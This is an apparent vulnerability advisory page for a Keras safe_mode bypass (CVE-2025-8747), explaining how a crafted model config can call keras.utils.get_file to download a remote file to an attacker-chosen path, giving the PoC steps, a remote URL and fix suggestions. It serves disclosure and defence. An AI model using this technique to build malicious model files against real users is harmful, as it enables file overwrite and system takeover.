Описание
Keras vulnerable to CVE-2025-1550 bypass via reuse of internal functionality
Summary
It is possible to bypass the mitigation introduced in response to CVE-2025-1550, when an untrusted Keras v3 model is loaded, even when “safe_mode” is enabled, by crafting malicious arguments to built-in Keras modules.
The vulnerability is exploitable on the default configuration and does not depend on user input (just requires an untrusted model to be loaded).
Impact
| Type | Vector | Impact |
|---|---|---|
| Unsafe deserialization | Client-Side (when loading untrusted model) | Arbitrary file overwrite. Can lead to Arbitrary code execution in many cases. |
Details
Keras’ safe_mode flag is designed to disallow unsafe lambda deserialization - specifically by rejecting any arbitrary embedded Python code, marked by the “lambda” class name. https://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py#L641 -
A fix to the vulnerability, allowing deserialization of the object only from internal Keras modules, was introduced in the commit bb340d6780fdd6e115f2f4f78d8dbe374971c930.
However, it is still possible to exploit model loading, for example by reusing the internal Keras function keras.utils.get_file, and download remote files to an attacker-controlled location.
This allows for arbitrary file overwrite which in many cases could also lead to remote code execution. For example, an attacker would be able to download a malicious authorized_keys file into the user’s SSH folder, giving the attacker full SSH access to the victim’s machine.
Since the model does not contain arbitrary Python code, this scenario will not be blocked by “safe_mode”. It will bypass the latest fix since it uses a function from one of the approved modules (keras).
Example
The following truncated config.json will cause a remote file download from https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js to the local /tmp folder, by sending arbitrary arguments to Keras’ builtin function keras.utils.get_file() -
PoC
-
Download malicious_model_download.keras to a local directory
-
Load the model -
- Observe that a new file
index.jswas created in the/tmpdirectory
Fix suggestions
- Add an additional flag
block_all_lambdathat allows users to completely disallow loading models with a Lambda layer. - Audit the
keras,keras_hub,keras_cv,keras_nlpmodules and remove/block all “gadget functions” which could be used by malicious ML models. - Add an additional flag
lambda_whitelist_functionsthat allows users to specify a list of functions that are allowed to be invoked by a Lambda layer
Credit
The vulnerability was discovered by Andrey Polkovnichenko of the JFrog Vulnerability Research
Ссылки
- https://github.com/keras-team/keras/security/advisories/GHSA-c9rc-mg46-23w3
- https://nvd.nist.gov/vuln/detail/CVE-2025-8747
- https://github.com/keras-team/keras/pull/21429
- https://github.com/keras-team/keras/commit/713172ab56b864e59e2aa79b1a51b0e728bba858
- https://jfrog.com/blog/keras-safe_mode-bypass-vulnerability
Пакеты
keras
>= 3.0.0, < 3.11.0
3.11.0
Связанные уязвимости
A safe mode bypass vulnerability in the `Model.load_model` method in Keras versions 3.0.0 through 3.10.0 allows an attacker to achieve arbitrary code execution by convincing a user to load a specially crafted `.keras` model archive.
A safe mode bypass vulnerability in the `Model.load_model` method in Keras versions 3.0.0 through 3.10.0 allows an attacker to achieve arbitrary code execution by convincing a user to load a specially crafted `.keras` model archive.
Keras safe_mode bypass allows arbitrary code execution when loading a malicious model.
A safe mode bypass vulnerability in the `Model.load_model` method in K ...